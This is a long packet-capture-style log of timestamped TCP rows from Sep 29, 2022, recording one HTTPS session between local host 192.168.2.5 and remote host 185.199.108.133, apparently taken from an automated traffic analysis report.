                                                                                                                                                Sep 29, 2022 14:51:28.478565931 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.478622913 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.478650093 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.478677034 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.478677034 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.478692055 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.478931904 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.480856895 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.480895042 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.481028080 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.481044054 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.481062889 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.481092930 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.481137991 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.481151104 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.481245995 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.481281042 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.481314898 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.481314898 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.481332064 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.481345892 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.482192993 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.482227087 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.482311964 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.482311964 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.482327938 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.483153105 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.483194113 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.483243942 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.483258009 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.483288050 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.483354092 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.483354092 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.483369112 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.483912945 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.483953953 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.484900951 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.484947920 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.485008955 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.485008955 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.485032082 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.485057116 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.485086918 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.485086918 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.485097885 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.485120058 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.485169888 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.485169888 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.487457037 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.487498999 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.487596035 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.487596035 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.487617016 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.488101959 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.488145113 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.488204956 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.488204956 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.488221884 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.488250971 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.488790989 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.490140915 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.490194082 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.490283012 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.490312099 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.490364075 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.490437984 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.490493059 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.490535021 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.490535021 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.490550995 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.490654945 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.490654945 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.490696907 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.490736961 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.490822077 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.490822077 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.490833044 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.491461992 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.491504908 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.491561890 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.491561890 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.491584063 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.491647005 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.491647005 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.492923975 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.492969036 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.493072033 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.493072033 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.493079901 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.493102074 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.493139982 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.493175983 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.493192911 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.493280888 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.493282080 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.493491888 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.493527889 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.493632078 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.493632078 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.493645906 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.493696928 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.494292974 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.494332075 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.494381905 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.494416952 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.494462967 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.494462967 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.496480942 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.496520996 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.496624947 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.496644974 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.496690035 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.496690035 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.496731043 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.496763945 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.496829033 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.496840954 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.496865034 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.496881962 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.496881962 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.496898890 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.496915102 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.496967077 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.496967077 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.497911930 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.497960091 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.498014927 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.498028994 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.498106956 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.498158932 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.498178005 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.498178005 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.498197079 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.498920918 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.498955011 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.498999119 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.498999119 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.499021053 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.499504089 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.499504089 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.500272989 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.500315905 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.500386953 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.500400066 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.500430107 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.500866890 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.500910044 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.500966072 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.500977993 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.501025915 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.502585888 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.502624035 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.502676010 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.502692938 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.502809048 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.503295898 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.503340960 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.503371954 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.503371954 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.503386021 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.503417969 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.503465891 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.503498077 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.503526926 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.503526926 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.503537893 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.504226923 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.504319906 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.504615068 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.505287886 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.505326033 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.505373001 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.505387068 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.505439043 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.505892992 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.505934954 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.505980015 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.505990982 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.506028891 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.506712914 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.506745100 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.506844997 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.506844997 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.506851912 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.506889105 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.506928921 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.506961107 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.506961107 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.506977081 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.507000923 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.507086992 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.508369923 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.508424997 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.508476973 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.508495092 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.508560896 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.508671999 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.508702040 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.508785963 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.508786917 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.508797884 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.508846998 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.508882046 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.508899927 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.508910894 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.508960962 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.508960962 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.509813070 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.509849072 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.509905100 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.509917021 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.509968996 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.509968996 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.511708021 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.511740923 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.511846066 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.511846066 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.511862993 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.512113094 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.512150049 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.512201071 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.512201071 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.512212992 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.512289047 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.512290001 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.513144970 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.513185024 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.513294935 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.513294935 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.513309002 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.513676882 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.513725042 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.513753891 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.513860941 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.513861895 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.513878107 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.514236927 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.514276981 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.514311075 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.514311075 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.514326096 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.514400959 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.514400959 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.515463114 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.515499115 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.515589952 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.515590906 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.515607119 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.515626907 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.515671015 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.515697956 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.515697956 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.515711069 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.515767097 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.515767097 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.516186953 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.516221046 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.516293049 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.516293049 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.516307116 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.516901970 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.517863989 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.517901897 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.517957926 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.517988920 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.518029928 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.518029928 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.518744946 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.518776894 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.518887043 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.518887043 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.518901110 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.518945932 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.518999100 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.519037962 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.519071102 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.519093037 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.519134998 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.519134998 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.521156073 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.521214008 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.521261930 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.521276951 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.521337986 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.521337986 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.522149086 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.522185087 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.522286892 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.522286892 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.522300959 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.522361040 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.522536993 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.522569895 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.522663116 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.522663116 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.522666931 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.522686958 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.522716999 CEST44349725185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:28.522778988 CEST49725443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:28.522778988 CEST49725443192.168.2.5185.199.108.133
